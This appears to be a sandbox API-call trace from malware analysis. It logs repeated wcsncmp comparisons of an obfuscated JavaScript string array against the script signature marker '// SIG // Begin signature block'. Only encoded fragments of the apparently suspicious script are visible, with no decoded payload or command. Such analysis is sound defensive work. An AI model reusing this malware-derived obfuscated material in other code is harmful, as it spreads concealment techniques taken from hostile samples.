	[0110.953] wcsncmp (_String1="sdiefgssqda=['wqtowqjClg==','w5Mc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0110.953] wcsncmp (_String1="diefgssqda=['wqtowqjClg==','w5Mcw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0110.953] wcsncmp (_String1="iefgssqda=['wqtowqjClg==','w5Mcwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0110.953] wcsncmp (_String1="efgssqda=['wqtowqjClg==','w5Mcwr/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0110.953] wcsncmp (_String1="fgssqda=['wqtowqjClg==','w5Mcwr/D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0110.953] wcsncmp (_String1="gssqda=['wqtowqjClg==','w5Mcwr/Dv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0110.953] wcsncmp (_String1="ssqda=['wqtowqjClg==','w5Mcwr/Dvc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0110.953] wcsncmp (_String1="sqda=['wqtowqjClg==','w5Mcwr/DvcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0110.953] wcsncmp (_String1="qda=['wqtowqjClg==','w5Mcwr/DvcOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0110.953] wcsncmp (_String1="da=['wqtowqjClg==','w5Mcwr/DvcOsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0110.953] wcsncmp (_String1="a=['wqtowqjClg==','w5Mcwr/DvcOsK2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0110.953] wcsncmp (_String1="=['wqtowqjClg==','w5Mcwr/DvcOsK2c", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0110.953] wcsncmp (_String1="['wqtowqjClg==','w5Mcwr/DvcOsK2cu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 78
	[0110.953] wcsncmp (_String1="'wqtowqjClg==','w5Mcwr/DvcOsK2cuB", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0110.953] wcsncmp (_String1="wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0110.953] wcsncmp (_String1="qtowqjClg==','w5Mcwr/DvcOsK2cuBQ=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0110.953] wcsncmp (_String1="towqjClg==','w5Mcwr/DvcOsK2cuBQ==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0110.953] wcsncmp (_String1="owqjClg==','w5Mcwr/DvcOsK2cuBQ=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0110.953] wcsncmp (_String1="wqjClg==','w5Mcwr/DvcOsK2cuBQ==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0110.953] wcsncmp (_String1="qjClg==','w5Mcwr/DvcOsK2cuBQ==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0110.953] wcsncmp (_String1="jClg==','w5Mcwr/DvcOsK2cuBQ==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0110.953] wcsncmp (_String1="Clg==','w5Mcwr/DvcOsK2cuBQ==','wr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0110.953] wcsncmp (_String1="lg==','w5Mcwr/DvcOsK2cuBQ==','wrv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0110.953] wcsncmp (_String1="g==','w5Mcwr/DvcOsK2cuBQ==','wrvD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0110.953] wcsncmp (_String1="==','w5Mcwr/DvcOsK2cuBQ==','wrvDp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0110.953] wcsncmp (_String1="=','w5Mcwr/DvcOsK2cuBQ==','wrvDps", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0110.953] wcsncmp (_String1="','w5Mcwr/DvcOsK2cuBQ==','wrvDpsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0110.953] wcsncmp (_String1=",'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0110.953] wcsncmp (_String1="'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0110.953] wcsncmp (_String1="w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0110.953] wcsncmp (_String1="5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0110.953] wcsncmp (_String1="Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0110.953] wcsncmp (_String1="cwr/DvcOsK2cuBQ==','wrvDpsOqD8KNw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0110.953] wcsncmp (_String1="wr/DvcOsK2cuBQ==','wrvDpsOqD8KNwp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0110.953] wcsncmp (_String1="r/DvcOsK2cuBQ==','wrvDpsOqD8KNwpb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0110.953] wcsncmp (_String1="/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0110.953] wcsncmp (_String1="DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0110.953] wcsncmp (_String1="vcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0110.954] wcsncmp (_String1="cOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0110.954] wcsncmp (_String1="OsK2cuBQ==','wrvDpsOqD8KNwpbCjh8p", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0110.954] wcsncmp (_String1="sK2cuBQ==','wrvDpsOqD8KNwpbCjh8pa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0110.954] wcsncmp (_String1="K2cuBQ==','wrvDpsOqD8KNwpbCjh8pas", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0110.954] wcsncmp (_String1="2cuBQ==','wrvDpsOqD8KNwpbCjh8pasK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0110.954] wcsncmp (_String1="cuBQ==','wrvDpsOqD8KNwpbCjh8pasKg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0110.954] wcsncmp (_String1="uBQ==','wrvDpsOqD8KNwpbCjh8pasKgV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0110.954] wcsncmp (_String1="BQ==','wrvDpsOqD8KNwpbCjh8pasKgV8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 53
	[0110.954] wcsncmp (_String1="Q==','wrvDpsOqD8KNwpbCjh8pasKgV8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0110.954] wcsncmp (_String1="==','wrvDpsOqD8KNwpbCjh8pasKgV8Oz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0110.954] wcsncmp (_String1="=','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0110.954] wcsncmp (_String1="','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0110.954] wcsncmp (_String1=",'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1x", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0110.954] wcsncmp (_String1="'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0110.954] wcsncmp (_String1="wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0110.954] wcsncmp (_String1="rvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0110.954] wcsncmp (_String1="vDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7j", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0110.954] wcsncmp (_String1="DpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0110.954] wcsncmp (_String1="psOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0110.954] wcsncmp (_String1="sOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0110.954] wcsncmp (_String1="OqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0110.954] wcsncmp (_String1="qD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Ow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0110.954] wcsncmp (_String1="D8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Oww", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0110.954] wcsncmp (_String1="8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0110.954] wcsncmp (_String1="KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwrt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0110.954] wcsncmp (_String1="NwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
	[0110.954] wcsncmp (_String1="wpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0110.954] wcsncmp (_String1="pbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0110.954] wcsncmp (_String1="bCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0110.954] wcsncmp (_String1="Cjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0110.954] wcsncmp (_String1="jh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0110.954] wcsncmp (_String1="h8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0110.954] wcsncmp (_String1="8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0111.409] wcsncmp (_String1="pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0111.409] wcsncmp (_String1="asKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0111.409] wcsncmp (_String1="sKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0111.409] wcsncmp (_String1="KgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0X", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0111.409] wcsncmp (_String1="gV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0111.410] wcsncmp (_String1="V8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0111.410] wcsncmp (_String1="8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0111.410] wcsncmp (_String1="Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0111.410] wcsncmp (_String1="zb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
	[0111.410] wcsncmp (_String1="b1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0111.410] wcsncmp (_String1="1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw6", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0111.410] wcsncmp (_String1="xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0111.410] wcsncmp (_String1="Zw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0111.410] wcsncmp (_String1="w7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0111.410] wcsncmp (_String1="7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0111.410] wcsncmp (_String1="jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0111.410] wcsncmp (_String1="Du8OwwrtSXDnDgMOwa0XCr8OAw69Dw79y", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0111.410] wcsncmp (_String1="u8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0111.410] wcsncmp (_String1="8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0111.410] wcsncmp (_String1="OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0111.410] wcsncmp (_String1="wwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0111.410] wcsncmp (_String1="wrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0111.410] wcsncmp (_String1="rtSXDnDgMOwa0XCr8OAw69Dw79yA8OW',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0111.410] wcsncmp (_String1="tSXDnDgMOwa0XCr8OAw69Dw79yA8OW','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0111.410] wcsncmp (_String1="SXDnDgMOwa0XCr8OAw69Dw79yA8OW','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 70
	[0111.410] wcsncmp (_String1="XDnDgMOwa0XCr8OAw69Dw79yA8OW','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0111.410] wcsncmp (_String1="DnDgMOwa0XCr8OAw69Dw79yA8OW','w5/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0111.410] wcsncmp (_String1="nDgMOwa0XCr8OAw69Dw79yA8OW','w5/C", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0111.410] wcsncmp (_String1="DgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0111.410] wcsncmp (_String1="gMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0111.410] wcsncmp (_String1="MOwa0XCr8OAw69Dw79yA8OW','w5/Cn8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0111.410] wcsncmp (_String1="Owa0XCr8OAw69Dw79yA8OW','w5/Cn8KK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0111.410] wcsncmp (_String1="wa0XCr8OAw69Dw79yA8OW','w5/Cn8KKb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0111.410] wcsncmp (_String1="a0XCr8OAw69Dw79yA8OW','w5/Cn8KKbM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0111.410] wcsncmp (_String1="0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 35
	[0111.410] wcsncmp (_String1="XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0111.410] wcsncmp (_String1="Cr8OAw69Dw79yA8OW','w5/Cn8KKbMK5H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0111.410] wcsncmp (_String1="r8OAw69Dw79yA8OW','w5/Cn8KKbMK5Hs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0111.410] wcsncmp (_String1="8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0111.410] wcsncmp (_String1="OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOe", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0111.410] wcsncmp (_String1="Aw69Dw79yA8OW','w5/Cn8KKbMK5HsOef", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0111.410] wcsncmp (_String1="w69Dw79yA8OW','w5/Cn8KKbMK5HsOefs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0111.411] wcsncmp (_String1="69Dw79yA8OW','w5/Cn8KKbMK5HsOefsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 41
	[0111.411] wcsncmp (_String1="9Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0111.411] wcsncmp (_String1="Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0111.411] wcsncmp (_String1="w79yA8OW','w5/Cn8KKbMK5HsOefsOg',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0111.411] wcsncmp (_String1="79yA8OW','w5/Cn8KKbMK5HsOefsOg','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0111.411] wcsncmp (_String1="9yA8OW','w5/Cn8KKbMK5HsOefsOg','M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0111.411] wcsncmp (_String1="yA8OW','w5/Cn8KKbMK5HsOefsOg','ME", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 108
	[0111.411] wcsncmp (_String1="A8OW','w5/Cn8KKbMK5HsOefsOg','MEr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0111.411] wcsncmp (_String1="8OW','w5/Cn8KKbMK5HsOefsOg','MErC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0111.411] wcsncmp (_String1="OW','w5/Cn8KKbMK5HsOefsOg','MErCs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0111.411] wcsncmp (_String1="W','w5/Cn8KKbMK5HsOefsOg','MErCsE", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 74
	[0111.411] wcsncmp (_String1="','w5/Cn8KKbMK5HsOefsOg','MErCsEP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0111.411] wcsncmp (_String1=",'w5/Cn8KKbMK5HsOefsOg','MErCsEPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0111.411] wcsncmp (_String1="'w5/Cn8KKbMK5HsOefsOg','MErCsEPDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0111.411] wcsncmp (_String1="w5/Cn8KKbMK5HsOefsOg','MErCsEPDhc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0111.411] wcsncmp (_String1="5/Cn8KKbMK5HsOefsOg','MErCsEPDhcK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0111.411] wcsncmp (_String1="/Cn8KKbMK5HsOefsOg','MErCsEPDhcKa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0111.411] wcsncmp (_String1="Cn8KKbMK5HsOefsOg','MErCsEPDhcKac", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0111.411] wcsncmp (_String1="n8KKbMK5HsOefsOg','MErCsEPDhcKacR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0111.411] wcsncmp (_String1="8KKbMK5HsOefsOg','MErCsEPDhcKacRH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0111.411] wcsncmp (_String1="KKbMK5HsOefsOg','MErCsEPDhcKacRHC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0111.411] wcsncmp (_String1="KbMK5HsOefsOg','MErCsEPDhcKacRHCm", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0111.411] wcsncmp (_String1="bMK5HsOefsOg','MErCsEPDhcKacRHCmA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0111.411] wcsncmp (_String1="MK5HsOefsOg','MErCsEPDhcKacRHCmA=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0111.411] wcsncmp (_String1="K5HsOefsOg','MErCsEPDhcKacRHCmA==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0111.411] wcsncmp (_String1="5HsOefsOg','MErCsEPDhcKacRHCmA=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0111.411] wcsncmp (_String1="HsOefsOg','MErCsEPDhcKacRHCmA==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0111.411] wcsncmp (_String1="sOefsOg','MErCsEPDhcKacRHCmA==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0111.411] wcsncmp (_String1="OefsOg','MErCsEPDhcKacRHCmA==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0111.411] wcsncmp (_String1="efsOg','MErCsEPDhcKacRHCmA==','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0111.411] wcsncmp (_String1="fsOg','MErCsEPDhcKacRHCmA==','woz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0111.411] wcsncmp (_String1="sOg','MErCsEPDhcKacRHCmA==','wozD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0111.411] wcsncmp (_String1="Og','MErCsEPDhcKacRHCmA==','wozDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0111.411] wcsncmp (_String1="g','MErCsEPDhcKacRHCmA==','wozDhs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0111.411] wcsncmp (_String1="','MErCsEPDhcKacRHCmA==','wozDhsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0111.411] wcsncmp (_String1=",'MErCsEPDhcKacRHCmA==','wozDhsKi", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0111.411] wcsncmp (_String1="'MErCsEPDhcKacRHCmA==','wozDhsKiw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0111.411] wcsncmp (_String1="MErCsEPDhcKacRHCmA==','wozDhsKiwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0111.412] wcsncmp (_String1="ErCsEPDhcKacRHCmA==','wozDhsKiwrP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
	[0111.412] wcsncmp (_String1="rCsEPDhcKacRHCmA==','wozDhsKiwrPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0111.412] wcsncmp (_String1="CsEPDhcKacRHCmA==','wozDhsKiwrPDl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0111.412] wcsncmp (_String1="sEPDhcKacRHCmA==','wozDhsKiwrPDl8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0111.412] wcsncmp (_String1="EPDhcKacRHCmA==','wozDhsKiwrPDl8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
	[0111.412] wcsncmp (_String1="PDhcKacRHCmA==','wozDhsKiwrPDl8Kx", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0111.412] wcsncmp (_String1="DhcKacRHCmA==','wozDhsKiwrPDl8KxF", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0111.412] wcsncmp (_String1="hcKacRHCmA==','wozDhsKiwrPDl8KxFA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0111.412] wcsncmp (_String1="cKacRHCmA==','wozDhsKiwrPDl8KxFAY", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0111.412] wcsncmp (_String1="KacRHCmA==','wozDhsKiwrPDl8KxFAY=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0111.412] wcsncmp (_String1="acRHCmA==','wozDhsKiwrPDl8KxFAY='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0111.412] wcsncmp (_String1="cRHCmA==','wozDhsKiwrPDl8KxFAY=',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0111.412] wcsncmp (_String1="RHCmA==','wozDhsKiwrPDl8KxFAY=','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
	[0111.412] wcsncmp (_String1="HCmA==','wozDhsKiwrPDl8KxFAY=','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0111.412] wcsncmp (_String1="CmA==','wozDhsKiwrPDl8KxFAY=','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0111.412] wcsncmp (_String1="mA==','wozDhsKiwrPDl8KxFAY=','woH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 96
	[0111.412] wcsncmp (_String1="A==','wozDhsKiwrPDl8KxFAY=','woHD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0111.412] wcsncmp (_String1="==','wozDhsKiwrPDl8KxFAY=','woHDt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0111.412] wcsncmp (_String1="=','wozDhsKiwrPDl8KxFAY=','woHDt2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0111.412] wcsncmp (_String1="','wozDhsKiwrPDl8KxFAY=','woHDt2Z", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0111.412] wcsncmp (_String1=",'wozDhsKiwrPDl8KxFAY=','woHDt2Zc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0111.412] wcsncmp (_String1="'wozDhsKiwrPDl8KxFAY=','woHDt2ZcP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0111.412] wcsncmp (_String1="wozDhsKiwrPDl8KxFAY=','woHDt2ZcPM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0111.412] wcsncmp (_String1="ozDhsKiwrPDl8KxFAY=','woHDt2ZcPMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0111.412] wcsncmp (_String1="zDhsKiwrPDl8KxFAY=','woHDt2ZcPMOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
